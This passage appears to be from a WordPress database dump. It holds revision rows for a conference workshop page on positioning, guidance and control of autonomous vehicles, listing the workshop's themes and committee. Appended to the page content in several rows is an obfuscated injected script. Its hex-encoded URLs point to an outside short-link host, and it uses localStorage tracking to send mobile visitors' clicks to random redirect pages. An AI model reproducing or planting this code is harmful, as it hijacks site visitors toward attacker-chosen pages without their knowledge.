)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-11 18:56:40','2022-11-11 18:56:40','',3066,'https://gsw2023.com/?p=3305',0,'revision','',0),
(3306,1,'2022-11-11 19:13:43','2022-11-11 19:13:43','<p>[vc_row][vc_column width=\"2/3\"][vc_column_text]</p>\n<h5><strong>Scope:</strong></h5>\n<h5><strong>Integrated Wireless, Multi-Sensor, Multi-Perception Systems for High-Precision Positioning, Guidance and Control of Autonomous Vehicles</strong></h5>\n<p>[/vc_column_text][vc_column_text]</p>\n<h6 style=\"text-align: justify; color: black;\"><strong>Autonomous vehicles (AVs) promise to enhance safety, reduce emissions, and improve transportation system efficiency and reliability. The growing demand for AVs is shaping the future of the automotive industry by transforming the in-vehicle experience and paving the way for large-scale implementation of autonomous driving. The positioning, guidance, and control technologies for future Avs are rapidly advancing. They require on onboard intelligence relying on a suite of sensors and systems such as global navigation satellite systems (GNSS) receivers, mmWave wireless technology (5G/6G), vehicle motion sensors and remote sensing systems including cameras, light detection and ranging (LiDAR) and radar. AVs that can sense the environment and navigating without human input require robust advanced positioning, navigation, and guidance for efficient operation in all environments and weather conditions. The availability of the above sensors and systems in future AVs provides an attractive opportunity to advance the robustness and safety of autonomous driving. This workshop will seek original contributions covering advanced topics related to the state of the art and future trends of positioning and mapping as well as control and guidance technologies for autonomous vehicles and future self-driving.</strong></h6>\n<h6><strong>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h6>\n<p>.[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2857\" img_size=\"600x400\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: left;\">CHAIRS</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"53\"][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Themes:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>GNSS based high precision positioning in challenging urban environments.</strong></h6>\n</li>\n<li>\n<h6><strong>New wireless technologies and methods for AV connectivity, cooperative perception, positioning, and path planning.</strong></h6>\n</li>\n<li>\n<h6><strong>Recent technical advances in perception systems meeting the growing AV demands.</strong></h6>\n</li>\n<li>\n<h6><strong>Advanced AI-based multi-system fusion for positioning, mapping, and guidance.</strong></h6>\n</li>\n<li>\n<h6><strong>Machine-learning based object identification, classification, and mapping.</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative self-Localization and mapping (SLAM).</strong></h6>\n</li>\n<li>\n<h6><strong>Control of AVs and mobile robots.</strong></h6>\n</li>\n<li>\n<h6><strong>Communication schemes for multiple AVs.</strong></h6>\n</li>\n<li>\n<h6><strong>Innovations in other autonomous systems (UAVs, UGVs, and drones)</strong></h6>\n</li>\n<li>\n<h6><strong>Applications of AVs.</strong></h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Cairo Lúcio Nascimento Junior, ITA, Brazil</strong></h6>\n</li>\n<li>\n<h6><strong>Peter Travis Jardine, Royal Military College of Canada, ON, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Mohamed Tamazin, Orolia, Montreal, QC, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Paul Hershey, Raytheon, USA (I still need to confirm with him)</strong></h6>\n</li>\n<li>\n<h6><strong>Mohamed Elhabiby, Micro Engineering Technologies Inc.</strong></h6>\n</li>\n<li>\n<h6><strong>Caroline Channel, ISAE-Supaero, France</strong></h6>\n</li>\n<li>\n<h6><strong>Ashraf Abosekeen, Military Technical College, Cairo, Egypt.</strong></h6>\n</li>\n<li>\n<h6><strong>Umar Iqbal, Mississippi State University, USA</strong></h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','NGC of AV: Navigation, Guidance and Control of Autonomous Vehicles','','inherit','closed','closed','','2856-revision-v1','','','2022-11-11 19:13:43','2022-11-11 19:13:43','',2856,'https://gsw2023.com/?p=3306',0,'revision','',0),
(3307,1,'2022-11-11 19:14:36','2022-11-11 19:14:36','<p>[vc_row][vc_column width=\"2/3\"][vc_column_text]</p>\n<h5><strong>Scope:</strong></h5>\n<h5><strong>Integrated Wireless, Multi-Sensor, Multi-Perception Systems for High-Precision Positioning, Guidance and Control of Autonomous Vehicles</strong></h5>\n<p>[/vc_column_text][vc_column_text]</p>\n<h6 style=\"text-align: justify; color: black;\"><strong>Autonomous vehicles (AVs) promise to enhance safety, reduce emissions, and improve transportation system efficiency and reliability. The growing demand for AVs is shaping the future of the automotive industry by transforming the in-vehicle experience and paving the way for large-scale implementation of autonomous driving. The positioning, guidance, and control technologies for future Avs are rapidly advancing. They require on onboard intelligence relying on a suite of sensors and systems such as global navigation satellite systems (GNSS) receivers, mmWave wireless technology (5G/6G), vehicle motion sensors and remote sensing systems including cameras, light detection and ranging (LiDAR) and radar. AVs that can sense the environment and navigating without human input require robust advanced positioning, navigation, and guidance for efficient operation in all environments and weather conditions. The availability of the above sensors and systems in future AVs provides an attractive opportunity to advance the robustness and safety of autonomous driving. This workshop will seek original contributions covering advanced topics related to the state of the art and future trends of positioning and mapping as well as control and guidance technologies for autonomous vehicles and future self-driving.</strong></h6>\n<h6><strong>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h6>\n<p>.[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2857\" img_size=\"600x400\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: left;\">CHAIRS</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"5px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"53\"][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Themes:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>GNSS based high precision positioning in challenging urban environments.</strong></h6>\n</li>\n<li>\n<h6><strong>New wireless technologies and methods for AV connectivity, cooperative perception, positioning, and path planning.</strong></h6>\n</li>\n<li>\n<h6><strong>Recent technical advances in perception systems meeting the growing AV demands.</strong></h6>\n</li>\n<li>\n<h6><strong>Advanced AI-based multi-system fusion for positioning, mapping, and guidance.</strong></h6>\n</li>\n<li>\n<h6><strong>Machine-learning based object identification, classification, and mapping.</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative self-Localization and mapping (SLAM).</strong></h6>\n</li>\n<li>\n<h6><strong>Control of AVs and mobile robots.</strong></h6>\n</li>\n<li>\n<h6><strong>Communication schemes for multiple AVs.</strong></h6>\n</li>\n<li>\n<h6><strong>Innovations in other autonomous systems (UAVs, UGVs, and drones)</strong></h6>\n</li>\n<li>\n<h6><strong>Applications of AVs.</strong></h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Cairo Lúcio Nascimento Junior, ITA, Brazil</strong></h6>\n</li>\n<li>\n<h6><strong>Peter Travis Jardine, Royal Military College of Canada, ON, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Mohamed Tamazin, Orolia, Montreal, QC, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Paul Hershey, Raytheon, USA (I still need to confirm with him)</strong></h6>\n</li>\n<li>\n<h6><strong>Mohamed Elhabiby, Micro Engineering Technologies Inc.</strong></h6>\n</li>\n<li>\n<h6><strong>Caroline Channel, ISAE-Supaero, France</strong></h6>\n</li>\n<li>\n<h6><strong>Ashraf Abosekeen, Military Technical College, Cairo, Egypt.</strong></h6>\n</li>\n<li>\n<h6><strong>Umar Iqbal, Mississippi State University, USA</strong></h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge 